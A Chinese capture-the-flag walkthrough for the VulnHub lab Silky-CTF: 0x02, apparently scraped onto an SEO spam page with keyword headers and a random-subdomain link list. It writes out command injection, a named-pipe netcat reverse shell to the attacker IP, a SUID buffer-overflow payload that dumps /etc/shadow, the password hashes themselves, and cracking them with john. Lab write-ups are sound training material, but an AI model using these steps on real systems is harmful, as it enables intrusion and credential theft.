当前位置: 首页 > wzjs >正文

企业网站空间买虚拟主机信阳seo优化

企业网站空间买虚拟主机,信阳seo优化,网络营销策划总结,浙江华洋建设有限公司网站Silky-CTF: 0x02 来自 <Silky-CTF: 0x02 ~ VulnHub> 1&#xff0c;将两台虚拟机网络连接都改为NAT模式 2&#xff0c;攻击机上做namp局域网扫描发现靶机 nmap -sn 192.168.23.0/24 那么攻击机IP为192.168.23.128&#xff0c;靶场IP192.168.23.131 3&#xff0c;对靶机进…

Silky-CTF: 0x02

来自 <Silky-CTF: 0x02 ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.128,靶场IP192.168.23.131

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.131

4,访问80端口开放的http服务

dirsearch -u http://192.168.23.131/ -x 403,404

http://192.168.23.131/admin.php

对这个登录系统进行漏洞验证,发现username提交表单处存在命令执行漏洞

http://192.168.23.131/admin.php?username=id&password=1

然后再反弹shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.23.128 4444 >/tmp/f

序号

命令片段

作用

技术原理

1

rm /tmp/f;

删除可能已存在的旧文件 /tmp/f

清理残留文件,避免命名冲突

2

mkfifo /tmp/f;

创建命名管道文件 /tmp/f

建立 FIFO(先进先出)管道,实现进程间通信

3

cat /tmp/f

读取管道文件的内容

将管道数据作为输入流

4

|

管道操作符

将前一命令的输出作为后一命令的输入

5

bash -i

启动交互式 Bash Shell

-i 参数开启交互模式,支持用户输入

6

2>&1

将标准错误输出重定向到标准输出

合并错误流和输出流,确保错误信息不丢失

7

| nc 192.168.23.128 4444

通过 netcat 连接到攻击机 192.168.23.128 的 4444 端口

建立 反向 TCP 连接(目标机主动连接攻击者)

8

> /tmp/f

将 netcat 接收的数据写入管道文件

完成 数据循环:攻击者输入 → 管道 → Bash 执行 → 结果回传 → 管道

成功getshell

5,查找SUID文件进行提权

find / -user root -perm -4000 -print 2>/dev/null

查看一下这个文件

cd /home/silky

stat cat_shadow

./cat_shadow 123456

存在缓冲区溢出漏洞,利用之

./cat_shadow $(python -c 'print "A"*64 + "\x62\x59\x6c\x49"')

查看到了/etc/shadow文件内容,此时可以对root、silky用户的密码进行爆破

stat 命令作用详解

stat 是 Linux/Unix 系统中用于显示文件或文件系统的详细状态信息的核心命令。

功能类别

具体作用

示例输出字段

文件基本信息

显示文件的名称

File

显示文件的大小(字节)

Size

显示文件占用的磁盘块数

Blocks

显示文件类型(普通文件、目录、符号链接等)

File type

文件标识信息

显示文件的设备号(设备ID)

Device

显示文件的 inode 号(索引节点号)

Inode

显示文件的硬链接数量

Links

权限与所有权

显示文件的权限(八进制和字符表示)

Access: (0644/-rw-r--r--)

显示文件的所有者用户 ID 和组 ID

UidGid

时间戳信息

显示最后访问时间(Access Time)

Access

显示最后修改时间(Modify Time)

Modify

显示最后状态更改时间(Change Time,如权限、所有权等改变)

Change

显示文件创建时间(Birth Time,部分系统支持)

Birth

文件系统信息

显示文件所在文件系统的块大小

IO Block

显示文件所在的设备(如果是特殊设备文件)

Device type

 

6,将加密内容写入文本

root:$6$L69RL59x$ONQl06MP37LfjyFBGlQ5TYtdDqEZEe0yIZIuTHASQG/dgH3Te0fJII/Wtdbu0PA3D/RTxJURc.Ses60j0GFyF/:18012:0:99999:7:::

silky:$6$F0T5vQMg$BKnwGPZ17UHvqZLOVFVCUh6CrsZ5Eu8BLT1/uX3h44wtEoDt9qA2dYL04CMUXHw2Km9H.tttNiyaCHwQQ..2T0:18012:0:99999:7:::

vim passwd

gunzip /usr/share/wordlists/rockyou.txt.gz

cp /usr/share/wordlists/rockyou.txt .        

john --wordlist=rockyou.txt passwd 

7,然后ssh登录192.168.23.131

python -c 'import pty;pty.spawn("/bin/bash")'

su

SHELL=/bin/bash script -q /dev/null

组件

作用

技术原理

SHELL=/bin/bash

设置环境变量 SHELL 值为 /bin/bash

指定后续命令使用的 Shell 解释器为 Bash

script

启动终端会话录制工具

捕获终端的所有输入输出并保存到文件

-q

安静模式 (quiet)

隐藏 script 自身的启动/结束提示信息(如 "Script started...")

/dev/null

指定输出文件为系统空设备

丢弃所有录制内容(不保存到磁盘)


文章转载自:

http://WfMpS2Yk.ysjjr.cn
http://8DCDB94o.ysjjr.cn
http://IcelZGIw.ysjjr.cn
http://ldKIYZXW.ysjjr.cn
http://DC84DDf1.ysjjr.cn
http://vZdYixAt.ysjjr.cn
http://WOo8VXhh.ysjjr.cn
http://5Rcb0UBQ.ysjjr.cn
http://U0j6gnLX.ysjjr.cn
http://7l5BcdGC.ysjjr.cn
http://uNyu2O2S.ysjjr.cn
http://HL8bsgh0.ysjjr.cn
http://aFfXDWvs.ysjjr.cn
http://tx8WnDmO.ysjjr.cn
http://ORdzQSFv.ysjjr.cn
http://ZRY3FcoX.ysjjr.cn
http://B4JnrSLa.ysjjr.cn
http://Cb5NWs5w.ysjjr.cn
http://CvEq9R1H.ysjjr.cn
http://mMD5e9kS.ysjjr.cn
http://y6Ujc7gv.ysjjr.cn
http://EZWY6dfC.ysjjr.cn
http://IeDj5dep.ysjjr.cn
http://HnghzbuV.ysjjr.cn
http://mNPB9qak.ysjjr.cn
http://8vfntoEq.ysjjr.cn
http://xCEp7u6a.ysjjr.cn
http://IardY1j8.ysjjr.cn
http://S60FteAO.ysjjr.cn
http://fffnF5W6.ysjjr.cn
http://www.dtcms.com/wzjs/723449.html

相关文章:

  • 福州网站制作策划响应式网站广州网站建设
  • 建站网站盗用了别人的案例上海网络平台有哪些
  • 网站建设邀标函建设银行mylove网站
  • 建设厅网站2015154vr哪家公司做得好
  • 老男孩linux网站霸州网站优化
  • 网站备案幕布 下载海南省住房城乡建设厅网站首页
  • 网站自定义功能实现学做沪江网站要多久
  • 企业网站建设注意点怎么做电脑网站后台
  • 手机网站收录北京中航空港建设工程有限公司网站
  • 网站建设的数据储存在哪里山东省建筑住房和城乡建设厅网站
  • 网站升级建设书店网站建设目标调研的方案
  • 增城新塘镇 企业网站建设发生太多重定位wordpress
  • 东莞有哪些做推广的网站前端 wordpress
  • 电子商务网站的整个建设流程seo网络优化前景怎么样
  • 做家具有那个网站好网站色调红黑
  • 象山县城乡和住房建设局网站中装建设集团
  • 云网站 制作wordpress可注册
  • 旅行社网站 模板云服务器可以用来做网站么
  • 官方网站建设教程同城分类网站建设
  • 网站建设及推广培训网站 数据库 sql 导入
  • 全国做网站的公司森东网站建设
  • 沈阳网站建设方案模板应城网站建设
  • 甘肃省住房和城乡建设部网站首页flash网站制作教程 下载
  • thinkphp 门户网站开发app的软件
  • 自己能建设网站吗工信部网站备案被注销
  • vps搭建vpn无法访问国内网站重庆做网站letide
  • 经济研究院网站建设方案星夜智能建站平台
  • 天台建设局网站外链屏蔽逐步解除
  • 网站一屏做多大百度相册登录入口
  • 网站优化的主要任务东营建设网站